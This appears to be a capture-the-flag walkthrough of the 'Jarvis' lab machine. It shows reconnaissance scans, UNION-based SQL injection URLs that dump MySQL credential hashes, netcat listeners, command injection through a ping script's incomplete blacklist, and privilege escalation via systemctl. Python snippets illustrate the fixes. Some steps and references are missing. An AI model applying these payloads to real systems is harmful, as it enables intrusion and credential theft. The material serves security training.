Vulnerability Explanation: The machine is vulnerable to SQL Injection, which allows querying arbitrary data from the databases and obtaining credentials to log in to phpMyAdmin. The installed phpMyAdmin version is vulnerable to LFI, which allows command execution and initial access.
Vulnerability Fix: Sanitize user input and apply least privilege.
Severity: Critical
Step to Compromise the Host:
Reconnaissance
└─$ nmap -p- -sC -sV -T4 10.10.10.143
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-22 10:45 EST
Nmap scan report for 10.10.10.143
Host is up (0.041s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
| 256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_ 256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
64999/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
Port 80 Apache httpd 2.4.25
Going through port 80, we just see a webpage. Viewing the source code reveals nothing interesting.
Let's run gobuster to check for hidden directories, as well as Nikto.
└─$ nikto -h http://10.10.10.143
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.143
+ Target Hostname: 10.10.10.143
+ Target Port: 80
+ Start Time: 2021-11-22 10:56:38 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'ironwaf' found, with contents: 2.0.3
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7863 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2021-11-22 11:03:20 (GMT-5) (402 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Clicking through all the buttons on the webpage, the only page that is not static is /room.php.
SQL Injection (Mysql)
Once I add ' to the end, it doesn't show anything.
I tried UNION SELECT 1 but got the same result. After adding columns from 1,2,3 up to 7, it just displays.
http://10.10.10.143/room.php?cod=10 UNION SELECT 1,2,3,4,5,6,7;-- -
So it is likely vulnerable to SQL Injection. Compare with the request below: if the page does not come back with the original content, something is wrong; if it does return the original page, it is vulnerable to SQL Injection.
http://10.10.10.143/room.php?cod=1 UNION SELECT 1,2,3,4,5,6,7;-- -
We can assume the SQL query looks like:
select id, room, rating, description, price, details, book from where cod=1
As we can see, the Cost is in column 3. We can replace it for testing.
http://10.10.10.143/room.php?cod=10 UNION SELECT "1","2","3","4","5","6","7"
http://10.10.10.143/room.php?cod=10 UNION SELECT "1","2","Testing","4","5","6","7"
Listing the DBs with the group_concat() function, which concatenates the values from different rows into a single field.
http://10.10.10.143/room.php?cod=10 UNION SELECT "1",group_concat(schema_name),"3","4","5","6","7" from information_schema.schemata
http://10.10.10.143/room.php?cod=10 UNION SELECT "1",(select schema_name from INFORMATION_SCHEMA.SCHEMATA LIMIT 1),"3","4","5","6","7"
http://10.10.10.143/room.php?cod=10 UNION SELECT "1",(select schema_name from INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),"3","4","5","6","7"
http://10.10.10.143/room.php?cod=10 UNION SELECT "1",(select schema_name from INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),"3","4","5","6","7"
http://10.10.10.143/room.php?cod=10 UNION SELECT "1",(select group_concat(schema_name) from INFORMATION_SCHEMA.SCHEMATA ),"3","4","5","6","7"
GET /room.php?cod=10 UNION SELECT "1",(select group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n") from INFORMATION_SCHEMA.columns where table_schema = 'hotel'),"3","4","5","6","7"
Checking on other databases.
/room.php?cod=10 UNION SELECT "1",(select group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n") from INFORMATION_SCHEMA.columns where table_schema = 'mysql'),"3","4","5","6","7"
GET /room.php?cod=10 UNION SELECT "1",(select group_concat(host,":",user,":",password, "\r\n") from mysql.user),"3","4","5","6","7"
Now we have the username and password. Let's save the hash to a file and crack it if it's weak.
Let's start our netcat listener on port 4444 and browse to the shell.php file to execute it.
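To make the root cause concrete, here is an added example (not code from the target or the original writeup) that rebuilds the assumed room query in an in-memory SQLite database and runs the page's probe against a string-concatenated version and a parameterized version. The table name room and the mapping of cod to the id column are assumptions, as is the sample row data.

```python
import sqlite3

# Constructed probe in the shape used above: a non-existent cod followed by a 7-column UNION.
PROBE = "10 UNION SELECT 1,2,'Testing',4,5,6,7"

COLUMNS = "id, room, rating, description, price, details, book"


def make_demo_db():
    """Build a small in-memory database with the assumed 7-column room table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE room (id INTEGER PRIMARY KEY, room TEXT, rating INTEGER,"
        " description TEXT, price TEXT, details TEXT, book TEXT)"
    )
    conn.execute(
        "INSERT INTO room VALUES (1, 'Suite', 5, 'Sea view', '$500', 'King bed', 'Book now')"
    )
    return conn


def fetch_room_vulnerable(conn, cod):
    """Pattern implied by the behaviour above: the cod parameter is pasted into the SQL text,
    so the UNION in PROBE becomes part of the query and its literals come back as a row."""
    sql = f"SELECT {COLUMNS} FROM room WHERE id={cod}"
    return conn.execute(sql).fetchall()


def fetch_room_hardened(conn, cod):
    """Mitigation: reject anything that is not an integer, then bind it as a parameter.
    The database never sees attacker-controlled SQL text, so PROBE returns no rows."""
    try:
        room_id = int(cod)
    except ValueError:
        return []
    sql = f"SELECT {COLUMNS} FROM room WHERE id=?"
    return conn.execute(sql, (room_id,)).fetchall()


if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable, cod=1     :", fetch_room_vulnerable(db, "1"))
    print("vulnerable, cod=PROBE :", fetch_room_vulnerable(db, PROBE))
    print("hardened,   cod=1     :", fetch_room_hardened(db, "1"))
    print("hardened,   cod=PROBE :", fetch_room_hardened(db, PROBE))
```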
└─$ nc -lvp 4444
http://10.10.10.143/shell.php
Privilege Escalation
Shell as pepper
We are now on the machine, but we don't have permission to read the flag file.
www-data@jarvis:/home/pepper$ cat user.txt
cat: user.txt: Permission denied
www-data@jarvis:/home/pepper$ ls -l
total 8
drwxr-xr-x 3 pepper pepper 4096 Mar 4 2019 Web
-r--r----- 1 root pepper 33 Mar 5 2019 user.txt
Let's check for any sudo misconfiguration with sudo -l.
www-data@jarvis:/home/pepper$ sudo -l
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
There are 3 functions we can use: Statistics, List the attackers' IPs, and Ping an attacker IP.
With the Ping function we can input an IP and it executes the ping command. There is a filter that forbids certain special characters, but $(command) substitution is not on the list and still gets executed.
import os

def exec_ping():
    # Blacklist of shell metacharacters the tool refuses; note that '$(' is not on it.
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    # The unvalidated input is concatenated straight into a shell command string.
    os.system('ping ' + command)
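As an added example (not part of simpler.py or the original writeup), the blacklist check is reproduced beside an allow-list version that accepts only a parseable IP address and runs ping through an argument list with no shell, which is the fix a code reviewer would ask for here. The function names and the constructed sample inputs are assumptions.

```python
import ipaddress
import subprocess

# The original tool's blacklist, copied from simpler.py above.
FORBIDDEN = ['&', ';', '-', '`', '||', '|']


def blacklist_allows(command: str) -> bool:
    """Reproduces the original check: True when the input would reach os.system()."""
    return not any(token in command for token in FORBIDDEN)


def parse_ip(command: str):
    """Allow-list validation: accept only a syntactically valid IPv4/IPv6 address,
    otherwise None. Anything that is not an address (including shell syntax) is rejected."""
    try:
        return ipaddress.ip_address(command.strip())
    except ValueError:
        return None


def ping_argv(command: str):
    """Build the argv list for ping, or None if the input is not an IP address."""
    addr = parse_ip(command)
    if addr is None:
        return None
    # A list of arguments is passed to the OS directly; no shell interprets it.
    return ['ping', '-c', '4', str(addr)]


def exec_ping_hardened(command: str) -> int:
    """Replacement for exec_ping(): validate, then run without shell=True."""
    argv = ping_argv(command)
    if argv is None:
        print('Not a valid IP address')
        return 1
    return subprocess.run(argv).returncode


if __name__ == '__main__':
    # Constructed inputs: the target IP from this writeup and an input carrying shell syntax.
    for sample in ['10.10.10.143', '10.10.10.143 $(cmd)']:
        print(repr(sample), 'blacklist allows:', blacklist_allows(sample),
              'allow-list argv:', ping_argv(sample))
```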
Let's create a bash reverse shell in a file /tmp/shell.sh and start our netcat listener on port 5555.
We cannot link the file from the /tmp folder. Let's move it to the /home folder to link it.
pepper@jarvis:/tmp$ systemctl link /tmp/file.service
Failed to link unit: No such file or directory
pepper@jarvis:/tmp$ systemctl link /home/pepper/root.service
Created symlink /etc/systemd/system/root.service -> /home/pepper/root.service.
pepper@jarvis:~$ systemctl enable --now /home/pepper/root.service
Created symlink /etc/systemd/system/multi-user.target.wants/root.service -> /home/pepper/root.service.
We can refer to the MySQL Cheat Sheet of .
Going through , we can perform privilege escalation via /bin/systemctl.